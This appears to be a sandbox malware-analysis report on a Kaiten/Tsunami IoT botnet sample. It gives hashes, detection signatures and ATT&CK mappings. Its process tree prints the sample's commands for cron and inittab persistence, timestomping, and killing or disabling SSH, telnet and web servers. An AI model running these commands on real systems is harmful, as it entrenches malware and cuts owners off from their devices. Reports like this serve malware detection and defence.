kaiten | 8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1

Analysis

max time kernel
8s
max time network
6s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
01-10-2024 15:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

irq2
Size

515KB
MD5

2ad737fb9e6ce08a164ddb8386f19b16
SHA1

86e87501edbdb8b6ee6ada9497ba2b62d741decc
SHA256

8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1
SHA512

068f4f7659c1d29ac0a6510e591100fba7fa1ffc445db21ce6487d77c8b34370fce3a24b4e9ff18b8910757123f593342dd80e473c0e337e7fa504eb3a13754f
SSDEEP

12288:v/J7M48SdpPK0RkLbZLn4nQdVV05tXqozEpwK9:HplxmLbJ4sY5tlzuv

Score

10^/10

kaiten botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/703-1-0x00400000-0x005777e8-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.4kF41i	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Indicator Removal: Timestomp 1 TTPs 4 IoCs

Adversaries may remove indicators of compromise from the host to evade detection.

defense_evasion

Timestomp

T1070.006

pid	Process
708	sh
710	touch
745	sh
746	touch

Enumerates kernel/hardware configuration 1 TTPs 9 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/748/stat	killall
File opened for reading	/proc/426/stat	killall
File opened for reading	/proc/36/stat	killall
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/764/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/696/cmdline	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/78/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/770/stat	killall
File opened for reading	/proc/4/stat	killall
File opened for reading	/proc/367/stat	killall
File opened for reading	/proc/786/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/695/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/116/cmdline	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/702/stat	killall
File opened for reading	/proc/310/stat	killall
File opened for reading	/proc/695/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/378/stat	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/367/stat	killall
File opened for reading	/proc/70/stat	killall
File opened for reading	/proc/667/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/166/stat	killall
File opened for reading	/proc/705/stat	killall
File opened for reading	/proc/775/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/149/stat	killall
File opened for reading	/proc/426/stat	killall
File opened for reading	/proc/702/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/370/stat	killall
File opened for reading	/proc/696/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/664/stat	killall
File opened for reading	/proc/695/cmdline	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/426/stat	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/378/stat	killall
File opened for reading	/proc/78/stat	killall
File opened for reading	/proc/764/stat	killall

/tmp/irq2
/tmp/irq2
1⤵
PID:703
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/irq2"
  2⤵
  - Indicator Removal: Timestomp
  PID:708
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/irq2
    3⤵
    - Indicator Removal: Timestomp
    PID:710
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/irq2\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
  2⤵
  PID:712
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:715
- - /bin/grep
    grep -v "no cron"
    3⤵
    PID:717
- - /bin/grep
    grep -v /tmp/irq2
    3⤵
    PID:716
- - /bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:718
- /bin/sh
  sh -c "echo \"* * * * * /tmp/irq2 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
  2⤵
  PID:721
- /bin/sh
  sh -c "crontab /var/run/.x00740882966"
  2⤵
  PID:723
- - /usr/bin/crontab
    crontab /var/run/.x00740882966
    3⤵
    - Creates/modifies Cron job
    PID:725
- /bin/sh
  sh -c "rm -rf /var/run/.x00740882966"
  2⤵
  PID:728
- - /bin/rm
    rm -rf /var/run/.x00740882966
    3⤵
    PID:730
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/irq2\" > /etc/inittab2"
  2⤵
  PID:732
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:734
- - /bin/grep
    grep -v /tmp/irq2
    3⤵
    PID:735
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/irq2\" >> /etc/inittab2"
  2⤵
  PID:738
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:740
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:741
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:742
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:743
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  - Indicator Removal: Timestomp
  PID:745
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    - Indicator Removal: Timestomp
    PID:746
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:749
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:750
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:751
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:752
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:753
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:755
- /bin/sh
  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:760
- - /bin/cat
    cat /var/run/httpd.pid
    3⤵
    PID:763
- /bin/sh
  sh -c "service httpd stop > /dev/null 2>&1 &"
  2⤵
  PID:762
- /bin/sh
  sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
  2⤵
  PID:765
- /bin/sh
  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
  2⤵
  PID:768
- /bin/sh
  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:770
- - /bin/cat
    cat /var/run/thttpd.pid
    3⤵
    PID:774
- /bin/sh
  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
  2⤵
  PID:773
- /bin/sh
  sh -c "nvram set http_enable=0 > /dev/null 2>&1"
  2⤵
  PID:776
- /bin/sh
  sh -c "killall -9 httpd > /dev/null 2>&1 &"
  2⤵
  PID:777
- /bin/sh
  sh -c "service telnetd stop > /dev/null 2>&1 &"
  2⤵
  PID:779
- /bin/sh
  sh -c "service sshd stop > /dev/null 2>&1 &"
  2⤵
  PID:781
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:785
- /bin/sh
  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
  2⤵
  PID:789
- /bin/sh
  sh -c "killall -9 dropbear > /dev/null 2>&1 &"
  2⤵
  PID:793
- /bin/sh
  sh -c "killall -9 sshd > /dev/null 2>&1 &"
  2⤵
  PID:797
- /bin/sh
  sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
  2⤵
  PID:800

/usr/sbin/service
service httpd stop
1⤵
PID:764
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:767
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:771
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:775
- /bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  - Enumerates kernel/hardware configuration
  PID:783
- /bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:786

/usr/bin/killall
killall -9 mini_httpd
1⤵
- Reads runtime system information
PID:766

/usr/bin/killall
killall -9 minihttpd
1⤵
- Reads runtime system information
PID:769

/usr/bin/killall
killall -9 httpd
1⤵
- Reads runtime system information
PID:778

/usr/sbin/service
service telnetd stop
1⤵
PID:780
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:787
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:791
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:795
- /bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:805
- /bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  - Enumerates kernel/hardware configuration
  PID:804

/usr/sbin/service
service sshd stop
1⤵
PID:784
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:790
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:794
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:798
- /bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:809
- /bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  - Enumerates kernel/hardware configuration
  PID:808

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:788

/usr/bin/killall
killall -9 utelnetd
1⤵
- Reads runtime system information
PID:792

/usr/bin/killall
killall -9 dropbear
1⤵
- Reads runtime system information
PID:796

/usr/local/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
PID:764

/usr/local/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
PID:764

/usr/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
PID:764

/usr/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
PID:764

/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
PID:764

/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop httpd.service
1⤵
- Enumerates kernel/hardware configuration
PID:764

/usr/bin/killall
killall -9 sshd
1⤵
- Reads runtime system information
PID:799

/usr/bin/killall
killall -9 lighttpd
1⤵
- Reads runtime system information
PID:801

/usr/local/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
PID:780

/usr/local/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
PID:780

/usr/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
PID:780

/usr/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
PID:780

/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
PID:780

/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop telnetd.service
1⤵
- Enumerates kernel/hardware configuration
PID:780

/usr/local/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
PID:784

/usr/local/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
PID:784

/usr/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
PID:784

/usr/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
PID:784

/sbin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
PID:784

/bin/systemctl
systemctl "--job-mode=ignore-dependencies" stop sshd.service
1⤵
- Enumerates kernel/hardware configuration
PID:784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Indicator Removal

T1070

Timestomp

T1070.006

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
25B

MD5
23a6588a2dbaf98c20dd9ad548f99576

SHA1
1d4504154b3abcef8b652f4832de895669737941

SHA256
6c7a9e9b6883cbcff02f673e5fb8bcdbe0b23459f0e063b80cba76ad22b1aff0

SHA512
de52be0bb66cc880f2cdd0cfc9d47949cbfa161a286d48d22fc22b42f484fcdb4317f34ee05194ab8f61b54e444d04c69459c5bb2fa4ebf8542194949fbc4837

Download Submit
/run/.x00740882966

Filesize
39B

MD5
65c1bbfcb74ec6f5c0efb513ebf1e69d

SHA1
a7a758354c25c91d88d9da83f90552bd9f973e9b

SHA256
5ca8963c17b0b8ff4dc3d6ac469b22eed780405b6574ab26b7da3074cc089001

SHA512
b86ac43a202e47d1ec305904b7227f9c5b32389b7702f9fa0856674812ae7c33f9a410901b14f6e9428fc14428c5adfaac20690d4d74c8755582566890e06abc

Download Submit
/var/spool/cron/crontabs/tmp.4kF41i

Filesize
235B

MD5
091ad06c77dca79fcbd5e49ebb67e02b

SHA1
db6ee0776a7e11f80f42a69f5efdb91a4a7e0745

SHA256
2ca93495ec08615f04b3f2413e95c612649c7b54c2dfc40e5e4d816c90e81ab0

SHA512
1e705876f5e1540e428b287861021fb4cd6af2f652a975cfdbb4dbb3e234400854f1ec6e3318bc5ad06c11e3d85965926a8c303ce95b1e29e84872d19c29f700

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads